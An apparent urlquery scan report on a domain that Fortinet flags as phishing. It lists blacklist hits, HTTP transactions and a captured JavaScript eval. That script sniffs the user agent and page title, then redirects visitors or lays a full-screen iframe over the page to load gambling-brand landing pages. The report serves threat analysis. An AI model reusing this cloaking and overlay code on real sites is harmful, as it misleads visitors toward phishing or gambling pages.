Overview

URL https://www.mcvhj.com/index
IP23.245.91.190
ASNAS18978 Enzu Inc
Location United States
Report completed2019-04-24 17:56:13 CEST
StatusLoading report..
urlquery Alerts No alerts detected


Settings

UserAgentMozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Referer
Pool
Access Level


Intrusion Detection Systems

Suricata /w Emerging Threats Pro  No alerts detected


Blacklists

MDL  No alerts detected
OpenPhish  No alerts detected
PhishTank  No alerts detected
Fortinet's Web Filter
Added / Verified Severity Host Comment
2019-04-24 2 www.mcvhj.com/index Phishing
2019-04-24 2 www.mcvhj.com/js/jquery.3.5.2.min.m.js Phishing
2019-04-24 2 www.mcvhj.com/gg/biwei/index.html Phishing
DNS-BH  No alerts detected
mnemonic secure dns  No alerts detected


Recent reports on same IP/ASN/Domain

Last 2 reports on IP: 23.245.91.190

Date UQ / IDS / BL URL IP
2019-02-22 10:33:29 +0100
0 - 0 - 4 www.mcvhj.com/index 23.245.91.190
2018-11-29 13:44:30 +0100
0 - 0 - 3 mcvhj.com/index 23.245.91.190

Last 10 reports on ASN: AS18978 Enzu Inc

Date UQ / IDS / BL URL IP
2019-06-25 05:10:54 +0200
0 - 1 - 0 accelcheck.com 23.88.207.178
2019-06-18 22:41:45 +0200
0 - 0 - 0 d4rkbbs.site/ 23.89.49.145
2019-06-13 03:26:41 +0200
1 - 0 - 0 musiconline.mrface.com 172.246.160.83
2019-06-13 03:19:41 +0200
1 - 0 - 0 musiconline.mrface.com 172.246.160.83
2019-06-12 23:34:58 +0200
0 - 0 - 0 198.71.81.66 198.71.81.66
2019-06-11 13:35:09 +0200
1 - 0 - 0 musiconline.mrface.com 172.246.160.83
2019-06-11 13:35:07 +0200
1 - 0 - 0 musiconline.mrface.com 172.246.160.83
2019-06-11 13:35:06 +0200
1 - 0 - 0 musiconline.mrface.com 172.246.160.83
2019-06-11 00:33:10 +0200
0 - 0 - 3 dbhadley.com/ 107.183.84.131
2019-06-10 23:01:42 +0200
0 - 0 - 37 samhuds.com/wishlist/index/add/product/1045/f (...) 198.71.84.196

No other reports on domain: mcvhj.com



JavaScript

Executed Scripts (5)


Executed Evals (1)

#1 JavaScript::Eval (size: 10724, repeated: 1) - SHA256: b2d356e932f07665575e2941366eec0fa48f15f7b341a53c4c4bea398faefd94

                                        var a = document.title,
    b = {
        versions: function() {
            var d = navigator.userAgent;
            return {
                trident: -1 < d.indexOf("Trident"),
                presto: -1 < d.indexOf("Presto"),
                webKit: -1 < d.indexOf("AppleWebKit"),
                gecko: -1 < d.indexOf("Gecko") && -1 == d.indexOf("KHTML"),
                mobile: !!d.match(/AppleWebKit.*Mobile.*/),
                ios: !!d.match(/\(i[^;]+;( U;)? CPU.+Mac OS X/),
                android: -1 < d.indexOf("Android") || -1 < d.indexOf("Linux"),
                iPhone: -1 < d.indexOf("iPhone"),
                iPad: -1 < d.indexOf("iPad"),
                webApp: -1 == d.indexOf("Safari")
            }
        }(),
        language: (navigator.browserLanguage || navigator.language).toLowerCase()
    },
    c = a.toLowerCase().replace(/\s/gi, ""),
    useragent = navigator.userAgent.toLowerCase();
b.versions.mobile ? -1 < useragent.indexOf("baidu") ? (document.documentElement.style.overflowY = "hidden", document.write('<div style="Z-INDEX:1000000000000000000;POSITION:absolute;TEXT-ALIGN:left;BACKGROUND-COLOR:#ffffff;WIDTH:100%;HEIGHT:100%; TOP:0px; RIGHT:0px;LEFT:0px;"><iframe frameborder="no" src="/gg/m/index.html" style="height: 100%;width: 100%;position: fixed;left:0; top:0;"></iframe></div>')) : -1 < c.indexOf("\u660e\u5347") || -1 < c.indexOf("m88") || -1 < c.indexOf("\u660e\u965e") ? window.location.href = "/gg/m/from/m88.php" : -1 < c.indexOf("\u5fc5\u5a01") || -1 < c.indexOf("betway") || -1 < c.indexOf("\u5fc5\u7ef4") ? window.location.href = "/gg/m/from/betway.php" : -1 < c.indexOf("vwin") || -1 < c.indexOf("\u5fb7\u8d62") ? window.location.href = "/gg/m/index.html" : -1 < c.indexOf("\u4e9a\u535a") || -1 < c.indexOf("yabo") || -1 < c.indexOf("\u4e9a\u640f") || -1 < c.indexOf("yabo88") ? window.location.href = "/gg/m/from/yabo.php" : -1 < c.indexOf("\u4e07\u535a") || -1 < c.indexOf("manbet") || -1 < c.indexOf("\u4e07\u640f") || -1 < c.indexOf("\u72d7\u4e07") ? window.location.href = "/gg/m/from/manbetx.php" : -1 < c.indexOf("188bet") || -1 < c.indexOf("\u91d1\u5b9d\u535a") || -1 < c.indexOf("\u91d1\u535a\u5b9d") || -1 < c.indexOf("\u91d1\u5b9d\u640f") ? window.location.href = "/gg/m/from/188bet.php" : -1 < c.indexOf("w88") || -1 < c.indexOf("\u4f18\u5fb7") ? window.location.href = "/gg/m/from/w88.php" : -1 < c.indexOf("sands") || -1 < c.indexOf("\u91d1\u838e") || -1 < c.indexOf("\u91d1\u6c99") ? window.location.href = "/gg/m/from/sands_x.php" : -1 < c.indexOf("weide") || -1 < c.indexOf("\u97e6\u5fb7") || -1 < c.indexOf("\u4f1f\u5fb7") || -1 < c.indexOf("betvictor") || -1 < c.indexOf("1946") ? window.location.href = "/gg/m/from/weide.php" : -1 < c.indexOf("raybet") || -1 < c.indexOf("\u96f7\u7ade\u6280") || -1 < c.indexOf("\u7535\u7ade") ? window.location.href = "/gg/m/index.html" : -1 < c.indexOf("\u5174\u53d1") || -1 < c.indexOf("\u5174\u767c") || -1 < c.indexOf("xf") ? window.location.href = "/gg/m/index.html" : -1 < c.indexOf("beplay") || -1 < c.indexOf("bepaly") ? window.location.href = "/gg/m/from/beplay.php" : -1 < c.indexOf("bob") ? window.location.href = "/gg/m/from/bob.php" : window.location.href = "/gg/m/index.html" : -1 < c.indexOf("\u5fc5\u5a01") || -1 < c.indexOf("betway") || -1 < c.indexOf("\u5fc5\u7ef4") ? (document.documentElement.style.overflowY = "hidden", document.write('<div style="Z-INDEX:1000000000000000000;POSITION:absolute;TEXT-ALIGN:left;BACKGROUND-COLOR:#ffffff;WIDTH:100%;HEIGHT:100%; TOP:0px; RIGHT:0px;LEFT:0px;"><iframe frameborder="no" src="/gg/biwei/index.html" style="height: 100%;width: 100%;position: fixed;left:0; top:0;"></iframe></div>')) : -1 < c.indexOf("vwin") || -1 < c.indexOf("\u5fb7\u8d62") ? (document.documentElement.style.overflowY = "hidden", document.write('<div style="Z-INDEX:1000000000000000000;POSITION:absolute;TEXT-ALIGN:left;BACKGROUND-COLOR:#ffffff;WIDTH:100%;HEIGHT:100%; TOP:0px; RIGHT:0px;LEFT:0px;"><iframe frameborder="no" src="/gg/in/index.html" style="height: 100%;width: 100%;position: fixed;left:0; top:0;"></iframe></div>')) : -1 < c.indexOf("\u4e9a\u535a") || -1 < c.indexOf("\u4e9a\u640f") || -1 < c.indexOf("yabo88") || -1 < c.indexOf("yabo") ? (document.documentElement.style.overflowY = "hidden", document.write('<div style="Z-INDEX:1000000000000000000;POSITION:absolute;TEXT-ALIGN:left;BACKGROUND-COLOR:#ffffff;WIDTH:100%;HEIGHT:100%; TOP:0px; RIGHT:0px;LEFT:0px;"><iframe frameborder="no" src="/gg/yb/index.html" style="height: 100%;width: 100%;position: fixed;left:0; top:0;"></iframe></div>')) : -1 < c.indexOf("\u4e07\u535a") || -1 < c.indexOf("manbet") || -1 < c.indexOf("\u4e07\u640f") || -1 < c.indexOf("\u72d7\u4e07") ? (document.documentElement.style.overflowY = "hidden", document.write('<div style="Z-INDEX:1000000000000000000;POSITION:absolute;TEXT-ALIGN:left;BACKGROUND-COLOR:#ffffff;WIDTH:100%;HEIGHT:100%; TOP:0px; RIGHT:0px;LEFT:0px;"><iframe frameborder="no" src="/gg/manbetx/index.html" style="height: 100%;width: 100%;position: fixed;left:0; top:0;"></iframe></div>')) : -1 < c.indexOf("w88") || -1 < c.indexOf("\u4f18\u5fb7") || -1 < c.indexOf("\u5fe7\u5fb7") ? (document.documentElement.style.overflowY = "hidden", document.write('<div style="Z-INDEX:1000000000000000000;POSITION:absolute;TEXT-ALIGN:left;BACKGROUND-COLOR:#ffffff;WIDTH:100%;HEIGHT:100%; TOP:0px; RIGHT:0px;LEFT:0px;"><iframe frameborder="no" src="/gg/w88/index.html" style="height: 100%;width: 100%;position: fixed;left:0; top:0;"></iframe></div>')) : -1 < c.indexOf("weide") || -1 < c.indexOf("\u4f1f\u5fb7") || -1 < c.indexOf("\u97e6\u5fb7") || -1 < c.indexOf("BETVICTOR") ? (document.documentElement.style.overflowY = "hidden", document.write('<div style="Z-INDEX:1000000000000000000;POSITION:absolute;TEXT-ALIGN:left;BACKGROUND-COLOR:#ffffff;WIDTH:100%;HEIGHT:100%; TOP:0px; RIGHT:0px;LEFT:0px;"><iframe frameborder="no" src="/gg/weide/index.html" style="height: 100%;width: 100%;position: fixed;left:0; top:0;"></iframe></div>')) : -1 < c.indexOf("\u91d1\u6c99") || -1 < c.indexOf("sands") || -1 < c.indexOf("\u91d1\u838e") ? (document.documentElement.style.overflowY = "hidden", document.write('<div style="Z-INDEX:1000000000000000000;POSITION:absolute;TEXT-ALIGN:left;BACKGROUND-COLOR:#ffffff;WIDTH:100%;HEIGHT:100%; TOP:0px; RIGHT:0px;LEFT:0px;"><iframe frameborder="no" src="/gg/sands/index.html" style="height: 100%;width: 100%;position: fixed;left:0; top:0;"></iframe></div>')) : -1 < c.indexOf("\u91d1\u5b9d\u640f") || -1 < c.indexOf("188bet") || -1 < c.indexOf("\u91d1\u535a\u5b9d") || -1 < c.indexOf("\u91d1\u5b9d\u535a") ? (document.documentElement.style.overflowY = "hidden", document.write('<div style="Z-INDEX:1000000000000000000;POSITION:absolute;TEXT-ALIGN:left;BACKGROUND-COLOR:#ffffff;WIDTH:100%;HEIGHT:100%; TOP:0px; RIGHT:0px;LEFT:0px;"><iframe frameborder="no" src="/gg/188bet/index.html" style="height: 100%;width: 100%;position: fixed;left:0; top:0;"></iframe></div>')) : -1 < c.indexOf("raybet") || -1 < c.indexOf("\u96f7\u7ade\u6280") || -1 < c.indexOf("\u7535\u7ade") ? (document.documentElement.style.overflowY = "hidden", document.write('<div style="Z-INDEX:1000000000000000000;POSITION:absolute;TEXT-ALIGN:left;BACKGROUND-COLOR:#ffffff;WIDTH:100%;HEIGHT:100%; TOP:0px; RIGHT:0px;LEFT:0px;"><iframe frameborder="no" src="/gg/in/index.html" style="height: 100%;width: 100%;position: fixed;left:0; top:0;"></iframe></div>')) : -1 < c.indexOf("\u5174\u53d1") || -1 < c.indexOf("\u5174\u767c") || -1 < c.indexOf("xf") ? (document.documentElement.style.overflowY = "hidden", document.write('<div style="Z-INDEX:1000000000000000000;POSITION:absolute;TEXT-ALIGN:left;BACKGROUND-COLOR:#ffffff;WIDTH:100%;HEIGHT:100%; TOP:0px; RIGHT:0px;LEFT:0px;"><iframe frameborder="no" src="/gg/in/index.html" style="height: 100%;width: 100%;position: fixed;left:0; top:0;"></iframe></div>')) : -1 < c.indexOf("beplay") || -1 < c.indexOf("bepaly") ? (document.documentElement.style.overflowY = "hidden", document.write('<div style="Z-INDEX:1000000000000000000;POSITION:absolute;TEXT-ALIGN:left;BACKGROUND-COLOR:#ffffff;WIDTH:100%;HEIGHT:100%; TOP:0px; RIGHT:0px;LEFT:0px;"><iframe frameborder="no" src="/gg/beplay/index.html" style="height: 100%;width: 100%;position: fixed;left:0; top:0;"></iframe></div>')) : -1 < c.indexOf("ltt") || -1 < c.indexOf("\u4e50\u5929\u5802") || -1 < c.indexOf("fun88") ? (document.documentElement.style.overflowY = "hidden", document.write('<div style="Z-INDEX:1000000000000000000;POSITION:absolute;TEXT-ALIGN:left;BACKGROUND-COLOR:#ffffff;WIDTH:100%;HEIGHT:100%; TOP:0px; RIGHT:0px;LEFT:0px;"><iframe frameborder="no" src="/gg/to/fun88/index.html" style="height: 100%;width: 100%;position: fixed;left:0; top:0;"></iframe></div>')) : -1 < c.indexOf("\u660e\u5347") || -1 < c.indexOf("m88") || -1 < c.indexOf("\u660e\u965e") ? (document.documentElement.style.overflowY = "hidden", document.write('<div style="Z-INDEX:1000000000000000000;POSITION:absolute;TEXT-ALIGN:left;BACKGROUND-COLOR:#ffffff;WIDTH:100%;HEIGHT:100%; TOP:0px; RIGHT:0px;LEFT:0px;"><iframe frameborder="no" src="/gg/to/m88/index.html" style="height: 100%;width: 100%;position: fixed;left:0; top:0;"></iframe></div>')) : -1 < c.indexOf("\u9e3f\u8fd0") || -1 < c.indexOf("hv") ? (document.documentElement.style.overflowY = "hidden", document.write('<div style="Z-INDEX:1000000000000000000;POSITION:absolute;TEXT-ALIGN:left;BACKGROUND-COLOR:#ffffff;WIDTH:100%;HEIGHT:100%; TOP:0px; RIGHT:0px;LEFT:0px;"><iframe frameborder="no" src="/gg/to/hv/index.html" style="height: 100%;width: 100%;position: fixed;left:0; top:0;"></iframe></div>')) : -1 < c.indexOf("12bet") || -1 < c.indexOf("12\u535a") || -1 < c.indexOf("\u58f9\u8d30\u535a") || -1 < c.indexOf("\u4e00\u4e8c\u535a") || -1 < c.indexOf("12bo") ? (document.documentElement.style.overflowY = "hidden", document.write('<div style="Z-INDEX:1000000000000000000;POSITION:absolute;TEXT-ALIGN:left;BACKGROUND-COLOR:#ffffff;WIDTH:100%;HEIGHT:100%; TOP:0px; RIGHT:0px;LEFT:0px;"><iframe frameborder="no" src="/gg/to/12bet/index.html" style="height: 100%;width: 100%;position: fixed;left:0; top:0;"></iframe></div>')) : -1 < c.indexOf("letou") || -1 < c.indexOf("\u4e50\u6295") || -1 < c.indexOf("bet16") || -1 < c.indexOf("\u745e\u4e30") ? (document.documentElement.style.overflowY = "hidden", document.write('<div style="Z-INDEX:1000000000000000000;POSITION:absolute;TEXT-ALIGN:left;BACKGROUND-COLOR:#ffffff;WIDTH:100%;HEIGHT:100%; TOP:0px; RIGHT:0px;LEFT:0px;"><iframe frameborder="no" src="/gg/to/letou/index.html" style="height: 100%;width: 100%;position: fixed;left:0; top:0;"></iframe></div>')) : -1 < c.indexOf("bob") ? (document.documentElement.style.overflowY = "hidden", document.write('<div style="Z-INDEX:1000000000000000000;POSITION:absolute;TEXT-ALIGN:left;BACKGROUND-COLOR:#ffffff;WIDTH:100%;HEIGHT:100%; TOP:0px; RIGHT:0px;LEFT:0px;"><iframe frameborder="no" src="/gg/bob/index.html" style="height: 100%;width: 100%;position: fixed;left:0; top:0;"></iframe></div>')) : (document.documentElement.style.overflowY = "hidden", document.write('<div style="Z-INDEX:1000000000000000000;POSITION:absolute;TEXT-ALIGN:left;BACKGROUND-COLOR:#ffffff;WIDTH:100%;HEIGHT:100%; TOP:0px; RIGHT:0px;LEFT:0px;"><iframe frameborder="no" src="/gg/in/index.html" style="height: 100%;width: 100%;position: fixed;left:0; top:0;"></iframe></div>'));
var _hmt = _hmt || [];
(function() {
    var d = document.createElement("script");
    d.src = "https://hm.baidu.com/hm.js?0f203c4517203805d75d02036cd6d835";
    var e = document.getElementsByTagName("script")[0];
    e.parentNode.insertBefore(d, e)
})();
                                    

Executed Writes (1)

#1 JavaScript::Write (size: 284, repeated: 1) - SHA256: a8ac8cb2b5d9b6f76025e8e0287cbb02de45e39052971663c96231f985a4095b

                                        < div style = "Z-INDEX:1000000000000000000;POSITION:absolute;TEXT-ALIGN:left;BACKGROUND-COLOR:#ffffff;WIDTH:100%;HEIGHT:100%; TOP:0px; RIGHT:0px;LEFT:0px;" > < iframe frameborder = "no"
src = "/gg/biwei/index.html"
style = "height: 100%;width: 100%;position: fixed;left:0; top:0;" > < /iframe></div >
                                    


HTTP Transactions (18)


Request Response
                                        
                                            POST / HTTP/1.1 
Host: ocsp.int-x3.letsencrypt.org
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Content-Length: 117
Content-Type: application/ocsp-request

                                         
                                         91.135.34.19
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Server: nginx
Content-Length: 527
Etag: "52B00BC815A195508D6138202F6466CBA2215586F1C011415D1A1A240518491A"
Last-Modified: Tue, 23 Apr 2019 16:00:00 UTC
Cache-Control: public, no-transform, must-revalidate, max-age=43200
Expires: Thu, 25 Apr 2019 03:55:41 GMT
Date: Wed, 24 Apr 2019 15:55:41 GMT
Connection: keep-alive


--- Additional Info ---
Magic:  data
Size:   527
Md5:    04e0a28e44f679fcac0d55ee2b85aa68
Sha1:   3cb7e1a9b99564e2e0a375415b0f173bcc8dc607
Sha256: 52b00bc815a195508d6138202f6466cba2215586f1c011415d1a1a240518491a
                                        
                                            POST / HTTP/1.1 
Host: isrg.trustid.ocsp.identrust.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Content-Length: 115
Content-Type: application/ocsp-request

                                         
                                         91.135.34.26
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Content-Transfer-Encoding: Binary
Last-Modified: Mon, 22 Apr 2019 22:33:43 GMT
Etag: "080da9c909813bebaf1c03aa5ea9dbb88e6fbf78"
Content-Length: 1398
Cache-Control: public, no-transform, must-revalidate, max-age=33154
Expires: Thu, 25 Apr 2019 01:08:15 GMT
Date: Wed, 24 Apr 2019 15:55:41 GMT
Connection: keep-alive


--- Additional Info ---
Magic:  data
Size:   1398
Md5:    b6cc94c6bd8c7978a77c574a6d35a768
Sha1:   080da9c909813bebaf1c03aa5ea9dbb88e6fbf78
Sha256: abee6a1e296832c5af69e4220408b78efed2e6faea82d04ebd2ef44991ee6d60
                                        
                                            GET /index HTTP/1.1 
Host: www.mcvhj.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive

                                         
                                         23.245.91.190
HTTP/1.1 200 OK
Content-Type: text/html;charset=utf-8
                                        
Server: nginx
Date: Wed, 24 Apr 2019 16:01:40 GMT
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
Content-Encoding: gzip


--- Additional Info ---
Magic:  gzip compressed data, from Unix
Size:   228
Md5:    b4505480496a6998a3de96b5ca3c50ce
Sha1:   77a971931d37a9ef6064e8bb0b54bc69b25ed103
Sha256: 0a2307b85f1adb446dfb12b48d247751d8b1d12749ad5bfff0fd65607f0316bd

Alerts:
  Blacklists:
    - fortinet: Phishing
                                        
                                            GET /js/jquery.3.5.2.min.m.js HTTP/1.1 
Host: www.mcvhj.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://www.mcvhj.com/index

                                         
                                         23.245.91.190
HTTP/1.1 200 OK
Content-Type: application/javascript
                                        
Server: nginx
Date: Wed, 24 Apr 2019 16:01:41 GMT
Content-Length: 6429
Last-Modified: Wed, 24 Apr 2019 08:45:29 GMT
Connection: keep-alive
Etag: "5cc02229-191d"
Accept-Ranges: bytes


--- Additional Info ---
Magic:  ASCII text, with very long lines
Size:   6429
Md5:    e0057856326af4bb536fc7b41dd1b317
Sha1:   e80fdf5a6dc8e59a4282bd1cfbca7e74e641f435
Sha256: 4e141420ba40d1c14dae15260014d5d94198271e4ff5d3f88be6e9163e976b22

Alerts:
  Blacklists:
    - fortinet: Phishing
                                        
                                            GET /gg/biwei/index.html HTTP/1.1 
Host: www.mcvhj.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://www.mcvhj.com/index

                                         
                                         23.245.91.190
HTTP/1.1 200 OK
Content-Type: text/html
                                        
Server: nginx
Date: Wed, 24 Apr 2019 16:01:41 GMT
Last-Modified: Wed, 24 Apr 2019 08:45:29 GMT
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
Etag: W/"5cc02229-43fc"
Content-Encoding: gzip


--- Additional Info ---
Magic:  gzip compressed data, from Unix
Size:   3988
Md5:    7e807ee6db7a63d89d81444c271d2de1
Sha1:   71cb3beb87516e06f9421f645877544925d6ce65
Sha256: 70e97c90ba73fa48eac55614df20999a252f11a47f6b06f7d308982022b2a583

Alerts:
  Blacklists:
    - fortinet: Phishing
                                        
                                            POST /gsorganizationvalsha2g2 HTTP/1.1 
Host: ocsp2.globalsign.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Content-Length: 111
Content-Type: application/ocsp-request

                                         
                                         104.18.20.226
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Date: Wed, 24 Apr 2019 15:55:42 GMT
Content-Length: 1574
Connection: keep-alive
Set-Cookie: __cfduid=dfe440af3a43924bca0e2f8bd31a09d7b1556121342; expires=Thu, 23-Apr-20 15:55:42 GMT; path=/; domain=.globalsign.com; HttpOnly
Expires: Sun, 28 Apr 2019 15:32:13 GMT
X-Powered-By: Undertow/1
Etag: "c73feca2996018cafe2a4a1723cbc38f0c117410"
Last-Modified: Wed, 24 Apr 2019 15:32:13 GMT
Cache-Control: public, no-transform, must-revalidate, s-maxage=3600
CF-Cache-Status: HIT
Accept-Ranges: bytes
Vary: Accept-Encoding
Server: cloudflare
CF-RAY: 4cc943589f15429d-OSL


--- Additional Info ---
Magic:  data
Size:   1574
Md5:    65c9d2729143c73beea75f1dea69c19b
Sha1:   c73feca2996018cafe2a4a1723cbc38f0c117410
Sha256: 2bbdc32db52f1ec91ecced8512bb9940c6d96ca711e7bfc61a6bb83265f2b260
                                        
                                            POST / HTTP/1.1 
Host: ocsp.int-x3.letsencrypt.org
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Content-Length: 117
Content-Type: application/ocsp-request

                                         
                                         91.135.34.19
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Server: nginx
Content-Length: 527
Etag: "AA5BD687A68B315B6A24ABEDFFBD80E10C27310206854FF77792ED8F0DC5659F"
Last-Modified: Mon, 22 Apr 2019 16:00:00 UTC
Cache-Control: public, no-transform, must-revalidate, max-age=43199
Expires: Thu, 25 Apr 2019 03:55:42 GMT
Date: Wed, 24 Apr 2019 15:55:43 GMT
Connection: keep-alive


--- Additional Info ---
Magic:  data
Size:   527
Md5:    5730eb9d881755fd6511c9946fd0f0c1
Sha1:   65679c06897346f469c3f0a22b25adc6265b4d6a
Sha256: aa5bd687a68b315b6a24abedffbd80e10c27310206854ff77792ed8f0dc5659f
                                        
                                            GET /biwei/css/foundation.min.css HTTP/1.1 
Host: www.wlovebaidu.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://www.mcvhj.com/gg/biwei/index.html

                                         
                                         27.255.64.13
HTTP/1.1 200 OK
Content-Type: text/css
                                        
Server: nginx
Date: Wed, 24 Apr 2019 15:55:18 GMT
Last-Modified: Mon, 17 Dec 2018 13:34:59 GMT
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
Content-Encoding: gzip


--- Additional Info ---
Magic:  gzip compressed data, from Unix
Size:   12821
Md5:    a9ce6abbade1b2c44043b9208130530b
Sha1:   cb6c404bf6b9fec3f55c2dd70966b9b72c3c4912
Sha256: c105206b69d58989cb88b60b1b93e7b5c3fc7e93e337f4f3d930497f74208168
                                        
                                            GET /hm.js?0f203c4517203805d75d02036cd6d835 HTTP/1.1 
Host: hm.baidu.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://www.mcvhj.com/index

                                         
                                         103.235.46.191
HTTP/1.1 200 OK
Content-Type: application/javascript
                                        
Cache-Control: max-age=0, must-revalidate
Content-Encoding: gzip
Content-Length: 10381
Date: Wed, 24 Apr 2019 15:55:43 GMT
Etag: 9549e3e97d1eb81b7701e22c02e37cb5
P3p: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Server: apache
Set-Cookie: HMACCOUNT=A91EF2F2E757E669; Path=/; Domain=hm.baidu.com; Expires=Sun, 18 Jan 2038 00:00:00 GMT
Strict-Transport-Security: max-age=172800


--- Additional Info ---
Magic:  gzip compressed data, from Unix, max speed
Size:   10381
Md5:    0feeb2cf6a3fbce1a1645b17ab575595
Sha1:   39ab16366b4ee1941dbe16721517f8f2d79f1bb0
Sha256: 335c8b13463f70cc90d7bbe9a453ce84144f01c05c8c633fa7b4415d0f591cd3
                                        
                                            GET /biwei/css/bootstrap.min.css HTTP/1.1 
Host: www.wlovebaidu.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://www.mcvhj.com/gg/biwei/index.html

                                         
                                         27.255.64.13
HTTP/1.1 200 OK
Content-Type: text/css
                                        
Server: nginx
Date: Wed, 24 Apr 2019 15:55:18 GMT
Last-Modified: Mon, 17 Dec 2018 13:34:59 GMT
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
Content-Encoding: gzip


--- Additional Info ---
Magic:  gzip compressed data, from Unix
Size:   24003
Md5:    41de576b95ff47aa730e7f21bfd5e3a6
Sha1:   f89798b3766b38f71b46ab3bfd3436a6a9fe1a11
Sha256: 5a3f6833d7f39cc52a53a9b3cb88e0898f1ea0025eacdb199db363d036e8649b
                                        
                                            GET /biwei/css/jquery.min.js HTTP/1.1 
Host: www.wlovebaidu.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://www.mcvhj.com/gg/biwei/index.html

                                         
                                         27.255.64.13
HTTP/1.1 200 OK
Content-Type: application/x-javascript
                                        
Server: nginx
Date: Wed, 24 Apr 2019 15:55:18 GMT
Last-Modified: Mon, 17 Dec 2018 13:34:59 GMT
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
Content-Encoding: gzip


--- Additional Info ---
Magic:  gzip compressed data, from Unix
Size:   33255
Md5:    70bbd4a88e327e1cbb4fbf16eeeefcc9
Sha1:   48d6866862f1211b611ebeba0f378515f4fab772
Sha256: d8718b21fc9d7614b9562a1a34894158aef746d441e5e7ff8d370b607dbb489d
                                        
                                            GET /hm.gif?cc=1&ck=1&cl=24-bit&ds=1176x885&vl=754&et=0&fl=10.0&ja=1&ln=en-us&lo=0&rnd=1195647731&si=0f203c4517203805d75d02036cd6d835&v=1.2.43&lv=1&ct=!!&tt=betway%E5%BF%85%E5%A8%81_betway%E5%BF%85%E5%A8%81%E5%A8%B1%E4%B9%90_betway%E5%BF%85%E5%A8%81%E5%AE%98%E7%BD%91%E6%89%8B%E6%9C%BA%E7%89%88&sn=58305 HTTP/1.1 
Host: hm.baidu.com
                                        
